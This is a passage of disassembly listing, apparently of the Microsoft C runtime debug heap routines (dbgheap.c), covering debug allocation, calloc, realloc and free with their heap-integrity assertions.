mov eax, [ebp+8]
push eax
call sub_416B00
add esp, 10h
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416B00 proc near ; CODE XREF: sub_416A80+1E�p
; .text:00416AED�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_C], 0
mov eax, dword_442C00
and eax, 4
test eax, eax
jz short loc_416B4C
loc_416B1C: ; CODE XREF: sub_416B00+4A�j
call sub_417BD0
test eax, eax
jnz short loc_416B46
push offset a_crtcheckmemor ; "_CrtCheckMemory()"
push 0
push 141h
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_416B46
int 3 ; Trap to Debugger
loc_416B46: ; CODE XREF: sub_416B00+23�j
; sub_416B00+43�j
xor ecx, ecx
test ecx, ecx
jnz short loc_416B1C
loc_416B4C: ; CODE XREF: sub_416B00+1A�j
mov edx, dword_442C04
mov [ebp+var_8], edx
mov eax, [ebp+var_8]
cmp eax, dword_442C08
jnz short loc_416B61
int 3 ; Trap to Debugger
loc_416B61: ; CODE XREF: sub_416B00+5E�j
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+var_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
push 0
push 1
call off_442D18
add esp, 1Ch
test eax, eax
jnz short loc_416BE4
cmp [ebp+arg_8], 0
jz short loc_416BB7
loc_416B8C: ; CODE XREF: sub_416B00+B3�j
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
push offset aClientHookAllo ; "Client hook allocation failure at file "...
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 1Ch
cmp eax, 1
jnz short loc_416BAF
int 3 ; Trap to Debugger
loc_416BAF: ; CODE XREF: sub_416B00+AC�j
xor edx, edx
test edx, edx
jnz short loc_416B8C
jmp short loc_416BDD
; ---------------------------------------------------------------------------
loc_416BB7: ; CODE XREF: sub_416B00+8A�j
; sub_416B00+DB�j
push offset aClientHookAl_0 ; "Client hook allocation failure.\n"
push offset aS_34 ; "%s"
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 18h
cmp eax, 1
jnz short loc_416BD7
int 3 ; Trap to Debugger
loc_416BD7: ; CODE XREF: sub_416B00+D4�j
xor eax, eax
test eax, eax
jnz short loc_416BB7
loc_416BDD: ; CODE XREF: sub_416B00+B5�j
xor eax, eax
jmp loc_416E0C
; ---------------------------------------------------------------------------
loc_416BE4: ; CODE XREF: sub_416B00+84�j
mov ecx, [ebp+arg_4]
and ecx, 0FFFFh
cmp ecx, 2
jz short loc_416C06
mov edx, dword_442C00
and edx, 1
test edx, edx
jnz short loc_416C06
mov [ebp+var_C], 1
loc_416C06: ; CODE XREF: sub_416B00+F0�j
; sub_416B00+FD�j
cmp [ebp+arg_0], 0FFFFFFE0h
ja short loc_416C17
mov eax, [ebp+arg_0]
add eax, 24h
cmp eax, 0FFFFFFE0h
jbe short loc_416C43
loc_416C17: ; CODE XREF: sub_416B00+10A�j
; sub_416B00+13A�j
mov ecx, [ebp+arg_0]
push ecx
push offset aInvalidAllocat ; "Invalid allocation size: %u bytes.\n"
push 0
push 0
push 0
push 1
call sub_41BF80
add esp, 18h
cmp eax, 1
jnz short loc_416C36
int 3 ; Trap to Debugger
loc_416C36: ; CODE XREF: sub_416B00+133�j
xor edx, edx
test edx, edx
jnz short loc_416C17
xor eax, eax
jmp loc_416E0C
; ---------------------------------------------------------------------------
loc_416C43: ; CODE XREF: sub_416B00+115�j
mov eax, [ebp+arg_4]
and eax, 0FFFFh
cmp eax, 4
jz short loc_416C90
cmp [ebp+arg_4], 1
jz short loc_416C90
mov ecx, [ebp+arg_4]
and ecx, 0FFFFh
cmp ecx, 2
jz short loc_416C90
cmp [ebp+arg_4], 3
jz short loc_416C90
loc_416C6A: ; CODE XREF: sub_416B00+18E�j
push offset aErrorMemoryAll ; "Error: memory allocation: bad memory bl"...
push offset aS_34 ; "%s"
push 0
push 0
push 0
push 1
call sub_41BF80
add esp, 18h
cmp eax, 1
jnz short loc_416C8A
int 3 ; Trap to Debugger
loc_416C8A: ; CODE XREF: sub_416B00+187�j
xor edx, edx
test edx, edx
jnz short loc_416C6A
loc_416C90: ; CODE XREF: sub_416B00+14E�j
; sub_416B00+154�j ...
mov eax, [ebp+arg_0]
add eax, 24h
mov [ebp+var_10], eax
mov ecx, [ebp+var_10]
push ecx
call sub_41BDF0
add esp, 4
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_416CB5
xor eax, eax
jmp loc_416E0C
; ---------------------------------------------------------------------------
loc_416CB5: ; CODE XREF: sub_416B00+1AC�j
mov edx, dword_442C04
add edx, 1
mov dword_442C04, edx
cmp [ebp+var_C], 0
jz short loc_416D13
mov eax, [ebp+var_4]
mov dword ptr [eax], 0
mov ecx, [ebp+var_4]
mov dword ptr [ecx+4], 0
mov edx, [ebp+var_4]
mov dword ptr [edx+8], 0
mov eax, [ebp+var_4]
mov dword ptr [eax+0Ch], 0FEDCBABCh
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_0]
mov [ecx+10h], edx
mov eax, [ebp+var_4]
mov dword ptr [eax+14h], 3
mov ecx, [ebp+var_4]
mov dword ptr [ecx+18h], 0
jmp loc_416DB3
; ---------------------------------------------------------------------------
loc_416D13: ; CODE XREF: sub_416B00+1C8�j
mov edx, dword_492060
add edx, [ebp+arg_0]
mov dword_492060, edx
mov eax, dword_492068
add eax, [ebp+arg_0]
mov dword_492068, eax
mov ecx, dword_492068
cmp ecx, dword_49206C
jbe short loc_416D49
mov edx, dword_492068
mov dword_49206C, edx
loc_416D49: ; CODE XREF: sub_416B00+23B�j
cmp dword_492064, 0
jz short loc_416D5F
mov eax, dword_492064
mov ecx, [ebp+var_4]
mov [eax+4], ecx
jmp short loc_416D68
; ---------------------------------------------------------------------------
loc_416D5F: ; CODE XREF: sub_416B00+250�j
mov edx, [ebp+var_4]
mov dword_49205C, edx
loc_416D68: ; CODE XREF: sub_416B00+25D�j
mov eax, [ebp+var_4]
mov ecx, dword_492064
mov [eax], ecx
mov edx, [ebp+var_4]
mov dword ptr [edx+4], 0
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_8]
mov [eax+8], ecx
mov edx, [ebp+var_4]
mov eax, [ebp+arg_C]
mov [edx+0Ch], eax
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_0]
mov [ecx+10h], edx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov [eax+14h], ecx
mov edx, [ebp+var_4]
mov eax, [ebp+var_8]
mov [edx+18h], eax
mov ecx, [ebp+var_4]
mov dword_492064, ecx
loc_416DB3: ; CODE XREF: sub_416B00+20E�j
push 4
xor edx, edx
mov dl, byte_442C0C
push edx
mov eax, [ebp+var_4]
add eax, 1Ch
push eax
call sub_4189A0
add esp, 0Ch
push 4
xor ecx, ecx
mov cl, byte_442C0C
push ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_4]
lea ecx, [eax+edx+20h]
push ecx
call sub_4189A0
add esp, 0Ch
mov edx, [ebp+arg_0]
push edx
xor eax, eax
mov al, byte_442C0E
push eax
mov ecx, [ebp+var_4]
add ecx, 20h
push ecx
call sub_4189A0
add esp, 0Ch
mov eax, [ebp+var_4]
add eax, 20h
loc_416E0C: ; CODE XREF: sub_416B00+DF�j
; sub_416B00+13E�j ...
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_416B00 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 0
push 0
push 1
mov eax, [ebp+0Ch]
push eax
mov ecx, [ebp+8]
push ecx
call sub_416E40
add esp, 14h
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416E40 proc near ; CODE XREF: .text:00416E31�p
; sub_41F930+2E�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
imul eax, [ebp+arg_0]
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_10]
push ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
call sub_416A30
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_416E99
mov edx, [ebp+var_8]
mov [ebp+var_C], edx
mov eax, [ebp+var_C]
add eax, [ebp+arg_4]
mov [ebp+var_4], eax
loc_416E80: ; CODE XREF: sub_416E40+57�j
mov ecx, [ebp+var_C]
cmp ecx, [ebp+var_4]
jnb short loc_416E99
mov edx, [ebp+var_C]
mov byte ptr [edx], 0
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
jmp short loc_416E80
; ---------------------------------------------------------------------------
loc_416E99: ; CODE XREF: sub_416E40+2F�j
; sub_416E40+46�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_416E40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416EA0 proc near ; CODE XREF: sub_4041AA+2E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0
push 0
push 1
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_416EC0
add esp, 14h
pop ebp
retn
sub_416EA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416EC0 proc near ; CODE XREF: sub_416EA0+11�p
; sub_430740+1B7�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push 9
call sub_41BC90
add esp, 4
push 1
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_416F00
add esp, 18h
mov [ebp+var_4], eax
push 9
call sub_41BD30
add esp, 4
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_416EC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416F00 proc near ; CODE XREF: sub_416EC0+24�p
; sub_417440+24�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp+var_14], 0
cmp [ebp+arg_0], 0
jnz short loc_416F33
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
call sub_416A30
add esp, 10h
jmp loc_41740A
; ---------------------------------------------------------------------------
loc_416F33: ; CODE XREF: sub_416F00+14�j
cmp [ebp+arg_14], 0
jz short loc_416F56
cmp [ebp+arg_4], 0
jnz short loc_416F56
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_4174C0
add esp, 8
xor eax, eax
jmp loc_41740A
; ---------------------------------------------------------------------------
loc_416F56: ; CODE XREF: sub_416F00+37�j
; sub_416F00+3D�j
mov eax, dword_442C00
and eax, 4
test eax, eax
jz short loc_416F92
loc_416F62: ; CODE XREF: sub_416F00+90�j
call sub_417BD0
test eax, eax
jnz short loc_416F8C
push offset a_crtcheckmemor ; "_CrtCheckMemory()"
push 0
push 239h
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_416F8C
int 3 ; Trap to Debugger
loc_416F8C: ; CODE XREF: sub_416F00+69�j
; sub_416F00+89�j
xor ecx, ecx
test ecx, ecx
jnz short loc_416F62
loc_416F92: ; CODE XREF: sub_416F00+60�j
mov edx, dword_442C04
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
cmp eax, dword_442C08
jnz short loc_416FA7
int 3 ; Trap to Debugger
loc_416FA7: ; CODE XREF: sub_416F00+A4�j
mov ecx, [ebp+arg_10]
push ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+var_10]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
push 2
call off_442D18
add esp, 1Ch
test eax, eax
jnz short loc_41702C
cmp [ebp+arg_C], 0
jz short loc_416FFF
loc_416FD4: ; CODE XREF: sub_416F00+FB�j
mov ecx, [ebp+arg_10]
push ecx
mov edx, [ebp+arg_C]
push edx
push offset aClientHookReAl ; "Client hook re-allocation failure at fi"...
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 1Ch
cmp eax, 1
jnz short loc_416FF7
int 3 ; Trap to Debugger
loc_416FF7: ; CODE XREF: sub_416F00+F4�j
xor eax, eax
test eax, eax
jnz short loc_416FD4
jmp short loc_417025
; ---------------------------------------------------------------------------
loc_416FFF: ; CODE XREF: sub_416F00+D2�j
; sub_416F00+123�j
push offset aClientHookRe_0 ; "Client hook re-allocation failure.\n"
push offset aS_34 ; "%s"
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 18h
cmp eax, 1
jnz short loc_41701F
int 3 ; Trap to Debugger
loc_41701F: ; CODE XREF: sub_416F00+11C�j
xor ecx, ecx
test ecx, ecx
jnz short loc_416FFF
loc_417025: ; CODE XREF: sub_416F00+FD�j
xor eax, eax
jmp loc_41740A
; ---------------------------------------------------------------------------
loc_41702C: ; CODE XREF: sub_416F00+CC�j
cmp [ebp+arg_4], 0FFFFFFDBh
jbe short loc_41705E
loc_417032: ; CODE XREF: sub_416F00+155�j
mov edx, [ebp+arg_4]
push edx
push offset aAllocationTooL ; "Allocation too large or negative: %u by"...
push 0
push 0
push 0
push 1
call sub_41BF80
add esp, 18h
cmp eax, 1
jnz short loc_417051
int 3 ; Trap to Debugger
loc_417051: ; CODE XREF: sub_416F00+14E�j
xor eax, eax
test eax, eax
jnz short loc_417032
xor eax, eax
jmp loc_41740A
; ---------------------------------------------------------------------------
loc_41705E: ; CODE XREF: sub_416F00+130�j
cmp [ebp+arg_8], 1
jz short loc_4170A6
mov ecx, [ebp+arg_8]
and ecx, 0FFFFh
cmp ecx, 4
jz short loc_4170A6
mov edx, [ebp+arg_8]
and edx, 0FFFFh
cmp edx, 2
jz short loc_4170A6
loc_417080: ; CODE XREF: sub_416F00+1A4�j
push offset aErrorMemoryAll ; "Error: memory allocation: bad memory bl"...
push offset aS_34 ; "%s"
push 0
push 0
push 0
push 1
call sub_41BF80
add esp, 18h
cmp eax, 1
jnz short loc_4170A0
int 3 ; Trap to Debugger
loc_4170A0: ; CODE XREF: sub_416F00+19D�j
xor eax, eax
test eax, eax
jnz short loc_417080
loc_4170A6: ; CODE XREF: sub_416F00+162�j
; sub_416F00+170�j ...
mov ecx, [ebp+arg_0]
push ecx
call sub_418030
add esp, 4
test eax, eax
jnz short loc_4170D7
push offset a_crtisvalidhea ; "_CrtIsValidHeapPointer(pUserData)"
push 0
push 261h
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_4170D7
int 3 ; Trap to Debugger
loc_4170D7: ; CODE XREF: sub_416F00+1B4�j
; sub_416F00+1D4�j
xor edx, edx
test edx, edx
jnz short loc_4170A6
mov eax, [ebp+arg_0]
sub eax, 20h
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
cmp dword ptr [ecx+14h], 3
jnz short loc_4170F6
mov [ebp+var_14], 1
loc_4170F6: ; CODE XREF: sub_416F00+1ED�j
cmp [ebp+var_14], 0
jz short loc_41713A
loc_4170FC: ; CODE XREF: sub_416F00+236�j
mov edx, [ebp+var_8]
cmp dword ptr [edx+0Ch], 0FEDCBABCh
jnz short loc_417111
mov eax, [ebp+var_8]
cmp dword ptr [eax+18h], 0
jz short loc_417132
loc_417111: ; CODE XREF: sub_416F00+206�j
push offset aPoldblockNline ; "pOldBlock->nLine == IGNORE_LINE && pOld"...
push 0
push 26Bh
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_417132
int 3 ; Trap to Debugger
loc_417132: ; CODE XREF: sub_416F00+20F�j
; sub_416F00+22F�j
xor ecx, ecx
test ecx, ecx
jnz short loc_4170FC
jmp short loc_41719E
; ---------------------------------------------------------------------------
loc_41713A: ; CODE XREF: sub_416F00+1FA�j
mov edx, [ebp+var_8]
mov eax, [edx+14h]
and eax, 0FFFFh
cmp eax, 2
jnz short loc_41715F
mov ecx, [ebp+arg_8]
and ecx, 0FFFFh
cmp ecx, 1
jnz short loc_41715F
mov [ebp+arg_8], 2
loc_41715F: ; CODE XREF: sub_416F00+248�j
; sub_416F00+256�j ...
mov edx, [ebp+var_8]
mov eax, [edx+14h]
and eax, 0FFFFh
mov ecx, [ebp+arg_8]
and ecx, 0FFFFh
cmp eax, ecx
jz short loc_417198
push offset a_block_typePol ; "_BLOCK_TYPE(pOldBlock->nBlockUse)==_BLO"...
push 0
push 272h
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_417198
int 3 ; Trap to Debugger
loc_417198: ; CODE XREF: sub_416F00+275�j
; sub_416F00+295�j
xor edx, edx
test edx, edx
jnz short loc_41715F
loc_41719E: ; CODE XREF: sub_416F00+238�j
cmp [ebp+arg_14], 0
jz short loc_4171C9
mov eax, [ebp+arg_4]
add eax, 24h
push eax
mov ecx, [ebp+var_8]
push ecx
call sub_41C6D0
add esp, 8
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_4171C7
xor eax, eax
jmp loc_41740A
; ---------------------------------------------------------------------------
loc_4171C7: ; CODE XREF: sub_416F00+2BE�j
jmp short loc_4171EC
; ---------------------------------------------------------------------------
loc_4171C9: ; CODE XREF: sub_416F00+2A2�j
mov edx, [ebp+arg_4]
add edx, 24h
push edx
mov eax, [ebp+var_8]
push eax
call sub_41C620
add esp, 8
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_4171EC
xor eax, eax
jmp loc_41740A
; ---------------------------------------------------------------------------
loc_4171EC: ; CODE XREF: sub_416F00:loc_4171C7�j
; sub_416F00+2E3�j
mov ecx, dword_442C04
add ecx, 1
mov dword_442C04, ecx
cmp [ebp+var_14], 0
jnz short loc_417257
mov edx, [ebp+var_C]
mov eax, dword_492060
sub eax, [edx+10h]
mov dword_492060, eax
mov ecx, dword_492060
add ecx, [ebp+arg_4]
mov dword_492060, ecx
mov edx, [ebp+var_C]
mov eax, dword_492068
sub eax, [edx+10h]
mov dword_492068, eax
mov ecx, dword_492068
add ecx, [ebp+arg_4]
mov dword_492068, ecx
mov edx, dword_492068
cmp edx, dword_49206C
jbe short loc_417257
mov eax, dword_492068
mov dword_49206C, eax
loc_417257: ; CODE XREF: sub_416F00+2FF�j
; sub_416F00+34B�j
mov ecx, [ebp+var_C]
add ecx, 20h
mov [ebp+var_4], ecx
mov edx, [ebp+var_C]
mov eax, [ebp+arg_4]
cmp eax, [edx+10h]
jbe short loc_41728F
mov ecx, [ebp+var_C]
mov edx, [ebp+arg_4]
sub edx, [ecx+10h]
push edx
xor eax, eax
mov al, byte_442C0E
push eax
mov ecx, [ebp+var_C]
mov edx, [ebp+var_4]
add edx, [ecx+10h]
push edx
call sub_4189A0
add esp, 0Ch
loc_41728F: ; CODE XREF: sub_416F00+369�j
push 4
xor eax, eax
mov al, byte_442C0C
push eax
mov ecx, [ebp+var_4]
add ecx, [ebp+arg_4]
push ecx
call sub_4189A0
add esp, 0Ch
cmp [ebp+var_14], 0
jnz short loc_4172C9
mov edx, [ebp+var_C]
mov eax, [ebp+arg_C]
mov [edx+8], eax
mov ecx, [ebp+var_C]
mov edx, [ebp+arg_10]
mov [ecx+0Ch], edx
mov eax, [ebp+var_C]
mov ecx, [ebp+var_10]
mov [eax+18h], ecx
loc_4172C9: ; CODE XREF: sub_416F00+3AC�j
mov edx, [ebp+var_C]
mov eax, [ebp+arg_4]
mov [edx+10h], eax
loc_4172D2: ; CODE XREF: sub_416F00+40B�j
cmp [ebp+arg_14], 0
jnz short loc_417307
cmp [ebp+arg_14], 0
jnz short loc_4172E6
mov ecx, [ebp+var_C]
cmp ecx, [ebp+var_8]
jz short loc_417307
loc_4172E6: ; CODE XREF: sub_416F00+3DC�j
push offset aFreallocFreall ; "fRealloc || (!fRealloc && pNewBlock == "...
push 0
push 2A8h
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_417307
int 3 ; Trap to Debugger
loc_417307: ; CODE XREF: sub_416F00+3D6�j
; sub_416F00+3E4�j ...
xor edx, edx
test edx, edx
jnz short loc_4172D2
mov eax, [ebp+var_C]
cmp eax, [ebp+var_8]
jz short loc_41731B
cmp [ebp+var_14], 0
jz short loc_417323
loc_41731B: ; CODE XREF: sub_416F00+413�j
mov eax, [ebp+var_4]
jmp loc_41740A
; ---------------------------------------------------------------------------
loc_417323: ; CODE XREF: sub_416F00+419�j
mov ecx, [ebp+var_C]
cmp dword ptr [ecx], 0
jz short loc_41733B
mov edx, [ebp+var_C]
mov eax, [edx]
mov ecx, [ebp+var_C]
mov edx, [ecx+4]
mov [eax+4], edx
jmp short loc_417377
; ---------------------------------------------------------------------------
loc_41733B: ; CODE XREF: sub_416F00+429�j
; sub_416F00+46A�j
mov eax, dword_49205C
cmp eax, [ebp+var_8]
jz short loc_417366
push offset a_plastblockPol ; "_pLastBlock == pOldBlock"
push 0
push 2B7h
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_417366
int 3 ; Trap to Debugger
loc_417366: ; CODE XREF: sub_416F00+443�j
; sub_416F00+463�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41733B
mov edx, [ebp+var_C]
mov eax, [edx+4]
mov dword_49205C, eax
loc_417377: ; CODE XREF: sub_416F00+439�j
mov ecx, [ebp+var_C]
cmp dword ptr [ecx+4], 0
jz short loc_41738F
mov edx, [ebp+var_C]
mov eax, [edx+4]
mov ecx, [ebp+var_C]
mov edx, [ecx]
mov [eax], edx
jmp short loc_4173CA
; ---------------------------------------------------------------------------
loc_41738F: ; CODE XREF: sub_416F00+47E�j
; sub_416F00+4BE�j
mov eax, dword_492064
cmp eax, [ebp+var_8]
jz short loc_4173BA
push offset a_pfirstblockPo ; "_pFirstBlock == pOldBlock"
push 0
push 2C2h
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_4173BA
int 3 ; Trap to Debugger
loc_4173BA: ; CODE XREF: sub_416F00+497�j
; sub_416F00+4B7�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41738F
mov edx, [ebp+var_C]
mov eax, [edx]
mov dword_492064, eax
loc_4173CA: ; CODE XREF: sub_416F00+48D�j
cmp dword_492064, 0
jz short loc_4173E1
mov ecx, dword_492064
mov edx, [ebp+var_C]
mov [ecx+4], edx
jmp short loc_4173E9
; ---------------------------------------------------------------------------
loc_4173E1: ; CODE XREF: sub_416F00+4D1�j
mov eax, [ebp+var_C]
mov dword_49205C, eax
loc_4173E9: ; CODE XREF: sub_416F00+4DF�j
mov ecx, [ebp+var_C]
mov edx, dword_492064
mov [ecx], edx
mov eax, [ebp+var_C]
mov dword ptr [eax+4], 0
mov ecx, [ebp+var_C]
mov dword_492064, ecx
mov eax, [ebp+var_4]
loc_41740A: ; CODE XREF: sub_416F00+2E�j
; sub_416F00+51�j ...
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_416F00 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 0
push 0
push 1
mov eax, [ebp+0Ch]
push eax
mov ecx, [ebp+8]
push ecx
call sub_417440
add esp, 14h
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417440 proc near ; CODE XREF: .text:00417431�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push 9
call sub_41BC90
add esp, 4
push 0
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_416F00
add esp, 18h
mov [ebp+var_4], eax
push 9
call sub_41BD30
add esp, 4
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_417440 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417480 proc near ; CODE XREF: sub_4013F1+10E�p
; sub_4013F1+116�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 1
mov eax, [ebp+arg_0]
push eax
call sub_4174C0
add esp, 8
pop ebp
retn
sub_417480 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 1
mov eax, [ebp+8]
push eax
call sub_4174F0
add esp, 8
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4174C0 proc near ; CODE XREF: sub_416F00+47�p
; sub_417480+9�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 9
call sub_41BC90
add esp, 4
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_4174F0
add esp, 8
push 9
call sub_41BD30
add esp, 4
pop ebp
retn
sub_4174C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4174F0 proc near ; CODE XREF: .text:004174A9�p
; sub_4174C0+15�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov eax, dword_442C00
and eax, 4
test eax, eax
jz short loc_417533
loc_417503: ; CODE XREF: sub_4174F0+41�j
call sub_417BD0
test eax, eax
jnz short loc_41752D
push offset a_crtcheckmemor ; "_CrtCheckMemory()"
push 0
push 3E1h
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_41752D
int 3 ; Trap to Debugger
loc_41752D: ; CODE XREF: sub_4174F0+1A�j
; sub_4174F0+3A�j
xor ecx, ecx
test ecx, ecx
jnz short loc_417503
loc_417533: ; CODE XREF: sub_4174F0+11�j
cmp [ebp+arg_0], 0
jnz short loc_41753E
jmp loc_4178D5
; ---------------------------------------------------------------------------
loc_41753E: ; CODE XREF: sub_4174F0+47�j
push 0
push 0
push 0
mov edx, [ebp+arg_4]
push edx
push 0
mov eax, [ebp+arg_0]
push eax
push 3
call off_442D18
add esp, 1Ch
test eax, eax
jnz short loc_417588
loc_41755D: ; CODE XREF: sub_4174F0+91�j
push offset aClientHookFree ; "Client hook free failure.\n"
push offset aS_34 ; "%s"
push 0
push 0
push 0
push 0
call sub_41BF80
add esp, 18h
cmp eax, 1
jnz short loc_41757D
int 3 ; Trap to Debugger
loc_41757D: ; CODE XREF: sub_4174F0+8A�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41755D
jmp loc_4178D5
; ---------------------------------------------------------------------------
loc_417588: ; CODE XREF: sub_4174F0+6B�j
; sub_4174F0+CD�j
mov edx, [ebp+arg_0]
push edx
call sub_418030
add esp, 4
test eax, eax
jnz short loc_4175B9
push offset a_crtisvalidhea ; "_CrtIsValidHeapPointer(pUserData)"
push 0
push 3F3h
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_4175B9
int 3 ; Trap to Debugger
loc_4175B9: ; CODE XREF: sub_4174F0+A6�j
; sub_4174F0+C6�j
xor eax, eax
test eax, eax
jnz short loc_417588
mov ecx, [ebp+arg_0]
sub ecx, 20h
mov [ebp+var_4], ecx
loc_4175C8: ; CODE XREF: sub_4174F0+12F�j
mov edx, [ebp+var_4]
mov eax, [edx+14h]
and eax, 0FFFFh
cmp eax, 4
jz short loc_41761B
mov ecx, [ebp+var_4]
cmp dword ptr [ecx+14h], 1
jz short loc_41761B
mov edx, [ebp+var_4]
mov eax, [edx+14h]
and eax, 0FFFFh
cmp eax, 2
jz short loc_41761B
mov ecx, [ebp+var_4]
cmp dword ptr [ecx+14h], 3
jz short loc_41761B
push offset a_block_type_is ; "_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)"
push 0
push 3F9h
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_41761B
int 3 ; Trap to Debugger
